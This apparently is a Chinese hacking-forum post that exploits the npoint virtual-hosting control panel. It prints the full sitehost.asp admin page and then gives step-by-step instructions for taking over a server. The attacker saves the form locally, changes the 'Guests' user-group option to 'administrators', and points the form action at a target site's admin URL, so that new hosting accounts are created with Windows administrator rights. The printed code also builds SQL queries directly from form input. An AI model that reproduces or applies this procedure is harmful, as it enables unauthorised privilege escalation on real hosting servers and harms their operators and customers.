这个漏洞本人 发现 已经很长时间了 由于时间比较忙一直没有发布。。
因为涉及服务器 比较多我就不发布怎么 得到后台PSW了。。。。
首先先分析下sitehost.asp他致命漏洞所在的页面
看红色部位
<!--#include file="sessioncolck.asp" -->
<!--#include file="pagesession/CS1.asp" -->
<!--#include file="../inc/conn.asp" -->
<!--#include file="../inc/char.asp" -->
<!--#include file="../inc/function.asp" -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Powered By npoint</title>
<link href="../css/style.css" rel="stylesheet" type="text/css" />
<script src=\'#\'" /js/ajax_x.js" type="text/javascript"></script>
<script src=\'#\'" /js/alt.js" type="text/javascript"></script>
</head>
<body>
<%
rs.open "Select * from hostcs",conn,1,1
ftpsoft=rs("ftpsoft") 'FTP软件
hostdomain=rs("hostdomain") '赠送域名
diskpe=rs("diskpe") '磁盘配额
ftpid=rs("ftpid") 'IISFTP标识符
doc=rs("doc") '默认文档
servupath=rs("servupath") 'Serv-u/Gene6 安装路径
servuid=rs("servuid") 'Serv-U 7.X ID号
servudomain=rs("servudomain") 'Serv-u7.x/Gene6 域名称
webpage=rs("webpage") '开设欢迎页
appsitenum=rs("appsitenum") '超过多少网站 自动创建程序池
yncreateapploop=rs("yncreateapploop") '是否自动创建程序池
dcapppool=rs("dcapppool") '当前自动创建完的程序池
appbtitle=rs("appbtitle") '自动创建程序池标头
rs.close
set iishost=server.createobject("npoint.host") '加载组件
if request.QueryString("action")="kshost" then
'叛断输入的域名是否合法或有带WWW
if trim(request.form("domain"))<>"" then
if ubound(split(trim(request.form("domain")),"."))<1 then
call ErrMsgBox("操作失败.\n\n1.绑定的域名不合法,请更换")
response.End()
else
if LCase(split(trim(request.form("domain")),".")(0))="www" then
call ErrMsgBox("操作失败.\n\n1.绑定的域名不包括www,请更换")
response.End()
end if
end if
end if
'叛断FTP账号是否合法
chkftp=chk_ftpuser(trim(request.form("FTPuser")))
if chkftp<>"1" then
call ErrMsgBox(chkftp)
response.End()
end if
'叛断域名是否存在
if trim(request.form("domain"))<>"" then
rs.open "Select host_domain,todomain from sitehost",conn,1,1
if rs.bof and rs.eof then
rs.close
else
for i=1 to rs.recordcount
if rs("host_domain")="" then
H_D=""
else
H_D=rs("host_domain") & "|"
end if
if rs("todomain")="" then
T_D=""
else
T_D=rs("todomain") & "|"
end if
All_domain=All_domain & H_D & T_D
rs.movenext
next
rs.close
if All_domain<>"" then
Fall_domain=split(mid(All_domain,1,len(All_domain)-1),"|")
for s=0 to ubound(Fall_domain)
if Fall_domain(s)=trim(request.form("domain")) or Fall_domain(s)="www."&trim(request.form("domain")) then
call ErrMsgBox("操作失败.\n\n1.绑定域名已存在,请更换.")
response.End()
end if
next
end if
end if
end if
'叛断FTP账号是否存在
rs.open "Select FTPuser from sitehost where FTPuser='"&trim(request.form("FTPuser"))&"'",conn,1,1
if rs.bof and rs.eof then
rs.close
'设置站点标识符ID号
rs.open "Select * from sitehost order by id desc",conn,1,1
if rs.bof and rs.eof then
ifid=2 '站点标识符
else
ifid=rs("ID")+1
end if
rs.close
'计算到期时间
sdate=date() '开设时间
if ubound(split(sdate,"-"))>1 then
d_fgh="-"
elseif ubound(split(sdate,"/"))>1 then
d_fgh="/"
elseif ubound(split(sdate,"."))>1 then
d_fgh="."
end if
Fjdate=split(sdate,d_fgh)
Tyear=int(Fjdate(0))+int(request.form("Eyear"))
Tmone=int(Fjdate(1))+int(request.form("Emone"))
if int(Fjdate(2))=31 then
dayx=int(Fjdate(2))-1
else
dayx=int(Fjdate(2))
end if
if Tmone>12 then
if Tmone-12=2 and dayx=29 then
Edate=Tyear+1 & d_fgh & Tmone-12 & d_fgh & "28" '到期时间
else
Edate=Tyear+1 & d_fgh & Tmone-12 & d_fgh & dayx '到期时间
end if
else
if Tmone=2 and dayx=29 then
Edate=Tyear & d_fgh & Tmone & d_fgh & "28" '到期时间
else
Edate=Tyear & d_fgh & Tmone & d_fgh & dayx '到期时间
end if
end if
'自动创建程序池或独立程序池
if yncreateapploop=1 then
if request.Form("autocreateapp")=0 then
Appstate=iishost.appstateyn(appbtitle&"_"&dcapppool)'叛断进程池是否存在 1为存在 0为不存在
if Appstate=1 then
uidapple=appbtitle&"_"&dcapppool
rs.open "Select apppool from sitehost where RID=1 and apppool='"&uidapple&"'",conn,1,1
if rs.bof and rs.eof then
rs.close
iisapppool_B=uidapple
else
if int(rs.recordcount)>int(appsitenum-1) then
R=iishost.creatiisapp(appbtitle&"_"&dcapppool+1, "", "", "",1,"","")
if R=1 then
rs.close
conn.Execute("Update hostcs Set dcapppool='"&dcapppool+1&"'")
iisapppool_B=appbtitle&"_"&dcapppool+1
else
rs.close
rs.open "Select * from errorlist where errora='"&R&"'",conn,1,1
if rs.bof and rs.eof then
call SucBox("操作失败.\n\n错误代码:"&R,"sitehost.asp")
else
call SucBox("操作失败.\n\n错误代码:"&R&"\n\n错误提示:"&rs("errorlist"),"sitehost.asp")
end if
rs.close
response.End()
end if
else
iisapppool_B=uidapple
end if
end if
elseif Appstate=0 then
R=iishost.creatiisapp(appbtitle&"_"&dcapppool, "", "", "",1,"","")
if R=1 then
iisapppool_B=appbtitle&"_"&dcapppool
else
rs.open "Select * from errorlist where errora='"&R&"'",conn,1,1
if rs.bof and rs.eof then
call SucBox("操作失败.\n\n错误代码:"&R,"sitehost.asp")
else
call SucBox("操作失败.\n\n错误代码:"&R&"\n\n错误提示:"&rs("errorlist"),"sitehost.asp")
end if
rs.close
response.End()
end if
end if
elseif request.Form("autocreateapp")=1 then
R=iishost.creatiisapp(""&trim(request.form("FTPuser"))&"", "", "", "",1,"","")
if R=1 then
iisapppool_B=trim(request.form("FTPuser"))
else
rs.open "Select * from errorlist where errora='"&R&"'",conn,1,1
if rs.bof and rs.eof then
call SucBox("操作失败.\n\n错误代码:"&R,"sitehost.asp")
else
call SucBox("操作失败.\n\n错误代码:"&R&"\n\n错误提示:"&rs("errorlist"),"sitehost.asp")
end if
rs.close
response.End()
end if
end if
elseif yncreateapploop=0 then
iisapppool_B=trim(request.form("apppool"))
end if
'开设主机
R=iishost.createsite(ifid,ftpid,trim(request.form("FTPuser")),trim(request.form("FTPpass")),trim(request.form("domain")),hostdomain,doc,trim(request.form("IISnum")),trim(request.form("MAxnum")),trim(request.form("spanum")),trim(request.form("sitepath")),iisapppool_B,"","","",trim(request.form("rznum")),ftpsoft,servupath,trim(request.form("csnum")),servuid,servudomain,trim(request.form("userGroup")),diskpe,webpage)
if int(R)>1 then
todomain=""
if trim(request.form("domain"))<>"" then
host_domain=trim(request.form("domain"))&"|www."&trim(request.form("domain"))
else
host_domain=""
end if
'添加主机记录
ftppassword=iishost.Eduserpassword(trim(request.form("FTPpass")),1) '加密FTP密码
if yncreateapploop=1 then
conn.Execute("insert into sitehost(RID,Ifid,FTPuser,FTPpass,fupath,host_domain,todomain,sitedoc,spanum,IISnum,MAxnum,tfordnum,sitepath,
apppool,rznum,csnum,userGroup,Azip,Azipnum,Xzip,Xzipnum,sitestate,Sdate,Edate,appdlnum,appautocreat) values(1,'"&R&"','"&trim(request.form("FTPuser"))&"','"&ftppassword&"',1,'"&host_domain&"','"&todomain&"','"&doc&"',"&trim(request.form("spanum"))&","&trim(request.form("IISnum"))&","&trim(request.form("MAxnum"))&","&trim(request.form("tfordnum"))&",'"&trim(request.form("sitepath"))&"','"&iisapppool_B&"',"&trim(request.form("rznum"))&","&trim(request.form("csnum"))&",'"&trim(request.form("userGroup"))&"',"&trim(request.form("Azip"))&","&trim(request.form("Azipnum"))&","&trim(request.form("Xzip"))&","&trim(request.form("Xzipnum"))&",1,'"&sdate&"','"&Edate&"',"&trim(request.Form("autocreateapp"))&","&yncreateapploop&")")
else
conn.Execute("insert into sitehost(RID,Ifid,FTPuser,FTPpass,fupath,host_domain,todomain,sitedoc,spanum,IISnum,MAxnum,tfordnum,sitepath,
apppool,rznum,csnum,userGroup,Azip,Azipnum,Xzip,Xzipnum,sitestate,Sdate,Edate,appdlnum,appautocreat) values(1,'"&R&"','"&trim(request.form("FTPuser"))&"','"&ftppassword&"',1,'"&host_domain&"','"&todomain&"','"&doc&"',"&trim(request.form("spanum"))&","&trim(request.form("IISnum"))&","&trim(request.form("MAxnum"))&","&trim(request.form("tfordnum"))&",'"&trim(request.form("sitepath"))&"','"&iisapppool_B&"',"&trim(request.form("rznum"))&","&trim(request.form("csnum"))&",'"&trim(request.form("userGroup"))&"',"&trim(request.form("Azip"))&","&trim(request.form("Azipnum"))&","&trim(request.form("Xzip"))&","&trim(request.form("Xzipnum"))&",1,'"&sdate&"','"&Edate&"',0,"&yncreateapploop&")")
end if
'更新站点数量
conn.Execute("Update sitepath Set sitenum=sitenum+1 Where sitepath='"&trim(request.form("sitepath"))&"\"&"'")
call SucBox("操作成功.","adminsitehost.asp")
else
if yncreateapploop=1 and trim(request.Form("autocreateapp"))=1 then
X=iishost.deliisapp(""&trim(request.form("FTPuser"))&"") '发生错误 - 删除独立程序池
end if
rs.open "Select * from errorlist where errora='"&R&"'",conn,1,1
if rs.bof and rs.eof then
call SucBox("操作失败.\n\n错误代码:"&R,"sitehost.asp")
else
call SucBox("操作失败.\n\n错误代码:"&R&"\n\n错误提示:"&rs("errorlist"),"sitehost.asp")
end if
rs.close
end if
else
rs.close
call ErrMsgBox("操作失败.\n\n1.FTP账号已存在,请更换.")
end if
end if
%><table width="100%" border="0" cellpadding="0" cellspacing="1" class="site_bg_site">
<tr>
<td width="100%" height="28" align="left" class="site_top_bg" scope="col"> ·站点虚拟主机开设</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="1" class="site_bg_site">
<script language="JavaScript" type="text/javascript">
function len(s) {
var l = 0;
var a = s.split("");
for (var i=0;i<a.length;i++) {
if (a[i].charCodeAt(0)<299) {
l++;
} else {
l+=2;
}
}
return l;
}
function checkform(theForm){
if (theForm.FTPuser.value=="") {
window.alert("请输入FTP账号");
theForm.FTPuser.focus();
return false;
}
if (len(theForm.FTPuser.value)<3) {
window.alert("FTP账号必须为3-20位的字符");
theForm.FTPuser.focus();
return false;
}
if (theForm.FTPpass.value=="") {
window.alert("请输入FTP密码");
theForm.FTPpass.focus();
return false;
}
if (len(theForm.FTPpass.value)<6) {
window.alert("FTP密码必须为6-20位的字符");
theForm.FTPpass.focus();
return false;
}
if (theForm.toFTPpass.value=="") {
window.alert("请输入FTP确认密码");
theForm.toFTPpass.focus();
return false;
}
if (theForm.toFTPpass.value!=theForm.FTPpass.value) {
window.alert("两次FTP密码不一致");
theForm.toFTPpass.focus();
return false;
}
if (theForm.spanum.value=="") {
window.alert("请输入空间大小");
theForm.spanum.focus();
return false;
}
if (theForm.IISnum.value=="") {
window.alert("请输入IIS连接数");
theForm.IISnum.focus();
return false;
}
if (theForm.MAxnum.value=="") {
window.alert("请输入带宽限制");
theForm.MAxnum.focus();
return false;
}
if (theForm.tfordnum.value=="") {
window.alert("请输入子目录绑定个数");
theForm.tfordnum.focus();
return false;
}
if (theForm.sitepath.value=="") {
window.alert("请选择存放路径");
theForm.sitepath.focus();
return false;
}
<%if yncreateapploop=0 then %>
if (theForm.apppool.value=="") {
window.alert("请选择应用程序池");
theForm.apppool.focus();
return false;
}
<%end if%>
if (theForm.Azipnum.value=="") {
window.alert("请选择可解压大小");
theForm.Azipnum.focus();
return false;
}
if (theForm.Xzipnum.value=="") {
window.alert("请选择可压缩大小");
theForm.Xzipnum.focus();
return false;
}
sAlert('正在开设虚拟主机...请稍等!');
theForm.button.disabled=true;
return true;
}
function exchange_App()
{
if (document.form1.autocreateapp.value =='0')
{
apppool_S.innerHTML ="由系统自动选择 每 <%=appsitenum%> 个站 自动创建 一个应用程序池";
}
if(document.form1.autocreateapp.value =='1')
{
apppool_S.innerHTML ="使用FTP账号创建一个独立应用程序池";
}
}
</script>
<form action="?action=kshost" method="post" id="from1" name="form1" onSubmit="return checkform(this)">
<tr>
<td width="13%" height="22" class="site_bg_bs" scope="col"> 域名绑定:<A href="http://www.</td">WWW.</td>
<td width="87%" class="site_bg_bs" scope="col"><input name="domain" type="text" class="input_to_to" id="domain" size="30" title="请输入域名(可留空) 如:npointhost.com(不包含www) ">
<span class="syt_1">可留空 如:</span>npointhost.com</td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> FTP账号:</td>
<td class="site_bg_bs" scope="col"><input name="FTPuser" type="text" class="input_to_to" id="FTPuser" size="30" maxlength="20" title="请输入FTP账号(必填)">
<span class="syt_1">* 请输入3-20位的字符</span></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> FTP密码:</td>
<td class="site_bg_bs" scope="col"><input name="FTPpass" type="password" class="input_to_to" id="FTPpass" size="30" maxlength="20" title="请输入FTP密码(必填)">
<span class="syt_1">* 请输入6-20位的字符</span></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> FTP确认密码:</td>
<td class="site_bg_bs" scope="col"><input name="toFTPpass" type="password" class="input_to_to" id="toFTPpass" size="30" maxlength="20"></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 空间大小:</td>
<td class="site_bg_bs" scope="col"><input name="spanum" type="text" class="input_to_to" id="spanum" title="请输入空间大小(必填) 如: 100" onKeyUp="value=value.replace(/[^0-9,]/g,'')" size="5" maxlength="9" />
M <span class="syt_1">必须0-9的数字</span></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> IIS连接数:</td>
<td class="site_bg_bs" scope="col"><input name="IISnum" type="text" class="input_to_to" id="IISnum" title="请输入IIS连接数(必填) 如: 100" onKeyUp="value=value.replace(/[^0-9,]/g,'')" size="5" maxlength="9" />
个 <span class="syt_1">必须0-9的数字 0</span>为不限制连接数</td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 带宽限制:</td>
<td class="site_bg_bs" scope="col"><input name="MAxnum" type="text" class="input_to_to" id="MAxnum" title="请输入带宽限制(必填) 如: 1024" onKeyUp="value=value.replace(/[^0-9,]/g,'')" size="5" maxlength="9">
KB/秒 <span class="syt_1">必须0-9的数字 0</span>为不限制带宽</td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 子目录绑定:</td>
<td class="site_bg_bs" scope="col"><input name="tfordnum" type="text" class="input_to_to" id="tfordnum" title="请输入子目录绑定个数 如: 2" onKeyUp="value=value.replace(/[^0-9,]/g,'')" size="5" maxlength="9">
个 <span class="syt_1">必须0-9的数字 0</span>为禁止使用</td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 存放路径:</td>
<td class="site_bg_bs" scope="col"><select name="sitepath" class="input_to_to" id="sitepath" title="请选择存放路径(必选)">
<option>请选择存放路径</option>
<%rs.open "Select * from sitepath where pathclass=1 and pathyn=1",conn,1,1
if rs.bof and rs.eof then
else
do while not rs.eof
%>
<option value="<%=mid(rs("sitepath"),1,len(rs("sitepath"))-1)%>"><%=rs("sitepath")%></option>
<%
rs.movenext
loop
end if
rs.close
%>
</select></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 应用程序池:</td>
<td class="site_bg_bs" scope="col"><%
if yncreateapploop=0 then%><select name="apppool" class="input_to_to" id="apppool">
<option>请选择应用程序池</option>
<%
R=iishost.listapppool()
listname=split(R,";")
listappnum=ubound(listname)
if listappnum<>0 then
for i=1 to listappnum
relist=split(listname(i),",")
%>
<option value="<%=relist(0) %>"><%=relist(0) %></option>
<% next
end if%></select><%elseif yncreateapploop=1 then
%><select name="autocreateapp" class="input_to_to" id="autocreateapp" onChange="javascript:exchange_App()">
<option value="0" selected>系统自动选择</option>
<option value="1">使用独立程序池</option>
</select>
<span id="apppool_S">由系统自动选择 每 <%=appsitenum%> 个站 自动创建 一个应用程序池</span><%end if%></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 日志记录:</td>
<td class="site_bg_bs" scope="col"><select name="rznum" class="input_to_to" id="rznum">
<option value="0">禁用</option>
<option value="1">启用</option>
</select></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 用户权限:</td>
<td class="site_bg_bs" scope="col"><input type="radio" name="csnum" id="radio" value="1"><span class="syt_1">读取</span> | <input type="radio" name="csnum" id="radio2" value="2"><span class="syt_1">读取/写入</span> | <input name="csnum" type="radio" id="radio3" value="3" checked><span class="syt_1">读取/写入/删除</span> | <input type="radio" name="csnum" id="radio4" value="4"><span class="syt_1">读取/写入/删除/运行</span></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 用户组:</td>
<td class="site_bg_bs" scope="col"><select name="userGroup" class="input_to_to" id="userGroup">
<option value="" selected>无用户组</option>
<option value="Guests">Guests</option>
</select></td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 在线解压:</td>
<td class="site_bg_bs" scope="col"><select name="Azip" class="input_to_to" id="Azip">
<option value="0">禁用</option>
<option value="1">启用</option>
</select> <input name="Azipnum" type="text" class="input_to_to" id="Azipnum" onKeyUp="value=value.replace(/[^0-9,]/g,'')" value="10" size="5" maxlength="9">
M <span class="syt_1">0 </span>为不限制大小</td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 在线压缩:</td>
<td class="site_bg_bs" scope="col"><select name="Xzip" class="input_to_to" id="Xzip">
<option value="0">禁用</option>
<option value="1">启用</option>
</select>
<input name="Xzipnum" type="text" class="input_to_to" id="Xzipnum" onKeyUp="value=value.replace(/[^0-9,]/g,'')" value="10" size="5" maxlength="9">
M <span class="syt_1">0 </span>为不限制大小</td>
</tr>
<tr>
<td height="22" class="site_bg_bs" scope="col"> 主机期限:</td>
<td class="site_bg_bs" scope="col"><select name="Eyear" class="input_to_to" id="Eyear">
<option value="0">0年</option>
<option value="1" selected>1年</option>
<option value="2">2年</option>
<option value="3">3年</option>
<option value="4">4年</option>
<option value="5">5年</option>
<option value="6">6年</option>
<option value="7">7年</option>
<option value="8">8年</option>
<option value="9">9年</option>
<option value="10">10年</option>
</select>
<select name="Emone" class="input_to_to" id="Emone">
<option value="0">0个月</option>
<option value="1">1个月</option>
<option value="2">2个月</option>
<option value="3">3个月</option>
<option value="4">4个月</option>
<option value="5">5个月</option>
<option value="6">6个月</option>
<option value="7">7个月</option>
<option value="8">8个月</option>
<option value="9">9个月</option>
<option value="10">10个月</option>
<option value="11">11个月</option>
</select></td>
</tr>
<tr>
<td height="28" colspan="2" align="center" class="site_bg_bs" scope="col"><input name="button" type="submit" class="button_butt" id="button" value="开设主机"></td>
</tr>
</form>
</table>
</body>
</html>
以上代码 431行<option value="Guests">Guests</option> 致命代码
看到以上分析大家明白了吗? 不明白没问题 继续分解。。。
等到管理密码 直接 进入 开空间 也就 http://www.***.com/admin/sitehost.asp
现在大家 先别急 右键 查看代码 将代码保存 到 本地 或直接另存为
保存到 本地后 进行代码修改 。Ctrl +F 进行查找 <option value="Guests">Guests</option>
将 <option value="Guests">Guests</option>Guests 修改为 administrators
<option value="administrators">administrators</option>
看到现在了,明白了吧? 继续
然后 Ctrl + F 查找 <form action="?action=kshost" method="post" id="from1" name="form1" onSubmit="return checkform(this)">
修改为 <form action="http://www.xxx.com/admin/sitehost.asp?action=kshost" method="post" id="from1" name="form1" onSubmit="return checkform(this)">
网上大把的了。。